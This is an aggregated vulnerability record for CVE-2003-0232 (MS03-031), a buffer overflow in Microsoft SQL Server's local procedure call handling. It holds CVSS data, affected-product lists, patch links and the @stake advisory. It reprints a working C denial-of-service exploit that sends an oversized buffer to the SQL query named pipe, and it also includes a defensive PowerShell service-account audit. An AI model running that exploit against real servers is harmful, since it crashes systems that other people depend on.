CVE-2003-0232
CVSS 7.2
Published: 2003-08-27 00:00:00
Revised: 2008-09-10 15:18:19

[Original] Microsoft SQL Server 7, 2000, and MSDE allow local users to execute arbitrary code via a certain request to the Local Procedure Calls (LPC) port that leads to a buffer overflow.


[CNNVD] Microsoft SQL Server LPC Port Local Buffer Overflow Vulnerability (MS03-031) (CNNVD-200308-122)

Microsoft SQL Server is a large-scale database system developed and maintained by Microsoft.
Microsoft SQL Server handles malformed messages sent to its LPC port incorrectly. A local attacker can exploit this flaw to carry out a buffer overflow attack and possibly execute arbitrary instructions on the system with the privileges of the database process.
Microsoft SQL Server uses LPC (Local Procedure Calls) to implement part of its inter-process communication, and the service provided on this port can be accessed by any user. Any local user can send messages to the SQL service through this port. By sending a specially crafted message to this port, information on the stack can be overwritten, allowing an attacker to execute arbitrary code in the context of the SQL process, which in turn gives the user read and write access to the database files.


- CVSS (Base Score)

CVSS Score: 7.2 [HIGH]
Confidentiality Impact: COMPLETE [total information disclosure; all system files exposed]
Integrity Impact: COMPLETE [system integrity can be completely compromised]
Availability Impact: COMPLETE [may cause a complete system outage]
Access Complexity: LOW [no special access conditions are needed to exploit]
Access Vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (Affected Platforms and Products)

cpe:/a:microsoft:sql_server:2000:sp3              Microsoft SQL Server 2000 Service Pack 3
cpe:/a:microsoft:sql_server:2000::desktop_engine
cpe:/a:microsoft:sql_server:2000:sp1              Microsoft SQL Server 2000 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp3a             Microsoft SQL Server 2000 Service Pack 3a
cpe:/a:microsoft:data_engine:1.0                  Microsoft Data Engine 1.0
cpe:/a:microsoft:sql_server:7.0:sp4               Microsoft SQL Server 7.0 Service Pack 4
cpe:/a:microsoft:sql_server:7.0:sp1               Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp2              Microsoft SQL Server 2000 Service Pack 2
cpe:/a:microsoft:sql_server:7.0:sp3               Microsoft SQL Server 7.0 Service Pack 3
cpe:/a:microsoft:sql_server:7.0:sp2               Microsoft SQL Server 7.0 Service Pack 2
cpe:/a:microsoft:sql_server:2000                  Microsoft SQL Server 2000
cpe:/a:microsoft:sql_server:7.0                   Microsoft SQL Server 7.0

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:303    SQL Server LPC Port Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for further technical detail on detection.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0232
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0232
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-122
(Official data source) CNNVD

- Other Links and Resources

http://www.kb.cert.org/vuls/id/584868
(UNKNOWN)  CERT-VN  VU#584868
http://www.microsoft.com/technet/security/bulletin/MS03-031.asp
(VENDOR_ADVISORY)  MS  MS03-031
http://www.atstake.com/research/advisories/2003/a072303-3.txt
(VENDOR_ADVISORY)  ATSTAKE  A072303-3

- Vulnerability Information

Microsoft SQL Server LPC Port Local Buffer Overflow Vulnerability (MS03-031)
High Risk  Boundary Condition Error
2003-08-27 00:00:00 2006-09-01 00:00:00
Local

- Advisories and Patches

Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS03-031) and a corresponding patch:
MS03-031: Cumulative Patch for Microsoft SQL Server (Q815495)
Link:
http://www.microsoft.com/technet/security/bulletin/MS03-031.asp

Patch downloads:
Microsoft SQL Server 7.0:
http://microsoft.com/downloads/details.aspx?FamilyId=FE5B0892-A5C9-44C2-9B42-0D291E9C1636&displaylang=en

Microsoft SQL 2000 32-bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=9814AE9D-BD44-40C5-ADD3-B8C99618E68D&displaylang=en

Microsoft SQL 2000 64-bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=72336508-057A-4E86-8F2E-CB1BD3A6A44B&displaylang=en

- Vulnerability Information (65)

MS Windows SQL Server Denial of Service Remote Exploit (MS03-031) (EDBID:65)
windows dos
2003-07-25 Verified
0 refdom
////////////////////////////////////////////////////////////////
//      
//      Microsoft SQL Server DoS Remote Exploit (MS03-031)
//                    By refdom of xfocus
//    
////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memset */
#include <windows.h>


void Usage()
{
	printf("******************************************\n");
	printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
	printf("\t Written by Refdom\n");
	printf("\t Email: refdom xfocus org\n");
	printf("\t Homepage: www.xfocus.org\n\n");
	printf("Usage: DOSMSSQL.exe server buffersize\n");
	printf("eg: DOSMSSQL.exe 192.168.0.1 9000\n\n");
	printf("The buffersize depends on service pack level.\n");
	printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
	printf("when buffersize is 9000, the server can be crashed.\n");
	printf("\n");
	printf("*******************************************\n\n");
}


int main(int argc, char* argv[])
{
	char lpPipeName[50];
	char *lpBuffer = NULL;
	unsigned long ulSize = 0;

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;

	Usage();

	printf("Starting...\n");

	if (argc != 3)
		goto Exit0;
	
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
	}
	else
	{
		printf("Error!server\n");
		goto Exit0;
	}

	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);
	if (NULL == lpBuffer)
	{
		printf("malloc error!\n");
		goto Exit0;
	}

	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = '\x12';
	*(lpBuffer + 1) = '\x01';
	*(lpBuffer + 2) = '\x00';
	
	printf("Connecting Server...\n");

	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		printf("Error!Connect server!%d\n", GetLastError());
		goto Exit0;
	}

	dwMode = PIPE_READMODE_MESSAGE;
	bResult = SetNamedPipeHandleState(
		hPipe,    // pipe handle
		&dwMode,  // new pipe mode
		NULL,     // don't set maximum bytes
		NULL);    // don't set maximum time
	if (!bResult)
	{
		printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
		goto Exit0;
	}

	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("\n\tError!WriteFile.%d\n\n", GetLastError());
		printf("When see the error message, the target may be crashed!!\n\n");
		goto Exit0;
	}

Exit0:
	
	return 0;
}

// milw0rm.com [2003-07-25]
		

- Vulnerability Information (F31429)

Atstake Security Advisory 03-07-23.3 (PacketStormID:F31429)
2003-07-24 00:00:00
Atstake, Andreas Junestam  atstake.com
advisory,local
CVE-2003-0232

Atstake Security Advisory A072303-3 - By sending a specially crafted message to the local LPC port for Microsoft SQL Server, it is possible to overwrite information stored on the stack. This would allow an attacker to execute code under SQL Server's credentials, thereby escalating privileges. This would then give the user read and write access to the database files. If the SQL Server is running under the Administrator or Local System account this would enable system compromise.


                             @stake Inc.
                           www.atstake.com 

                          Security Advisory

 
Advisory Name: Microsoft SQL Server local code execution
 Release Date: 07/23/2003
  Application: Microsoft SQL Server 7, 2000, MSDE
     Platform: Windows NT/2000/XP
     Severity: Local code execution / Denial of Service
       Author: Andreas Junestam (andreas@atstake.com)
Vendor Status: Microsoft has patch available
CVE Candidate: CAN-2003-0232
    Reference: www.atstake.com/research/advisories/2003/a072303-3.txt


Overview:

Microsoft SQL Server uses LPC (Local Procedure Calls) to
implement some of its inter-process communication. The
port providing this service can be used by anyone. By sending
a specially crafted message to SQL Server through this port,
an attacker can overwrite certain parts of memory and thus
execute code using the SQL Server's credentials.


Detailed Description:

Microsoft SQL Server uses different ways of communicating with
a client locally, one of them is over an LPC port. This port
can be used by any local user to send information to the SQL
Server service. By sending a specially crafted message to this
port it is possible to overwrite information stored on the
stack. This would allow an attacker to execute code under
SQL Server's credentials, thereby escalating privileges. This
would then give the user read and write access to the
database files.  If the SQL Server is running under the
Administrator or Local System account this would enable
system compromise.

As with most SQL Server issues MSDE is affected.  MSDE is
included in many Microsoft and non-Microsoft products. A list
of products that include MSDE is here:

http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=10&tabid=13


Vendor Response:

Microsoft was contacted on 02/05/2003

Microsoft has a bulletin and patch available:

http://www.microsoft.com/technet/security/bulletin/MS03-031.asp


Recommendation:

Install the vendor patch. If your SQL Server is running under
the Administrator or Local System account consider running SQL
Server under a less privileged account.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2003-0232


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2003 @stake, Inc. All rights reserved.

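The advisory's recommendation (install the patch, and do not run SQL Server as Administrator or Local System) can be audited on a host with the script below. This is an added example, not code from the @stake advisory or from Microsoft; it assumes Windows PowerShell 5.1 or later in an elevated session on the SQL Server host, and Get-SqlServiceAccountRisk is a name chosen here.

```powershell
# Added example (not from the advisory or the vendor): report the account each SQL Server
# engine service runs under and flag the configurations the advisory warns about.
# Assumes Windows PowerShell 5.1+ (Get-LocalGroupMember) in an elevated session.

function Get-SqlServiceAccountRisk {
    # Engine services are named MSSQLSERVER (default instance) or MSSQL$<Instance>
    # (named instances; MSDE 2000 instances appear the same way).
    $sqlServices = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.Name -eq 'MSSQLSERVER' -or $_.Name -like 'MSSQL$*' }

    # Local Administrators members as "MACHINE\name" or "DOMAIN\name".
    # Errors are suppressed because the cmdlet is unavailable on domain controllers.
    $adminMembers = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty Name)

    foreach ($svc in $sqlServices) {
        # Win32_Service reports local accounts as ".\name"; normalise before comparing.
        $account = $svc.StartName -replace '^\.\\', "$env:COMPUTERNAME\"

        $risk = if ($account -match '^(LocalSystem|NT AUTHORITY\\SYSTEM)$') {
            'HIGH: runs as Local System; code running under SQL Server owns the host'
        } elseif ($adminMembers -contains $account) {
            'HIGH: runs as a member of the local Administrators group'
        } elseif ($account -match '^(NT AUTHORITY\\(NetworkService|LocalService)|NT Service\\)') {
            'OK: built-in low-privilege service identity'
        } else {
            'REVIEW: user account; confirm it holds no administrative rights'
        }

        [pscustomobject]@{
            Service = $svc.Name
            Account = $svc.StartName
            State   = $svc.State
            Risk    = $risk
        }
    }
}

Get-SqlServiceAccountRisk | Format-Table -AutoSize
```

A service reported as HIGH should be moved to a dedicated low-privilege account in addition to applying MS03-031, since the patch removes this overflow but not the blast radius of the next one.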


    

- Vulnerability Information

10123
Microsoft SQL Server LPC Packet Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Vendor Verified

- Vulnerability Description

Microsoft SQL Server uses different ways of communicating with a client locally, one of them is over an LPC port. This port can be used by any local user to send information to the SQL Server service. By sending a specially crafted message to this port it is possible to overwrite information stored on the stack. This would allow an attacker to execute code under SQL Server's credentials, thereby escalating privileges. This would then give the user read and write access to the database files. If the SQL Server is running under the Administrator or Local System account this would enable system compromise.

- Timeline

2003-07-23 Unknown
Unknown 2003-07-23

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Microsoft SQL Server LPC Port Request Buffer Overflow Vulnerability
Boundary Condition Error 8275
No Yes
2003-07-23 12:00:00 2009-07-11 10:56:00
Discovery is credited to Andreas Junestam of @Stake.

- Affected Program Versions

Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft SQL Server 7.0 SP4
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP3
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP2
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP1
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Data Engine (MSDE) 1.0
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.0.1
+ Centennial UK Ltd Centennial Discovery 4.4
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0
+ Gerber Technology WebPDM 3.9
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.0
- Microsoft Access 2000
- Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
- Microsoft Visual Studio 6.0
+ PowerQuest ControlCenter ST 2.0
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ Research In Motion Blackberry Enterprise Server 2.0.0.65
+ Trend Micro Control Manager 2.5
+ Trend Micro Damage Cleanup Server 1.0
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Websense Reporter 6.3.1

- Vulnerability Discussion

Microsoft SQL Server is prone to a buffer overflow issue. The issue may be exploited by sending malformed data via the LPC (Local Procedure Call) port. This issue could allow an attacker that is authenticated to the SQL Server to elevate their privilege level.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at vuldb@securityfocus.com.

- Solution

The vendor has released a patch to address this issue:


Microsoft SQL Server 2000 SP3

Microsoft Data Engine (MSDE) 1.0

Microsoft SQL Server 2000 Desktop Engine

Microsoft SQL Server 7.0 SP4

Microsoft SQL Server 2000 SP3a

- Related References

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP.

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.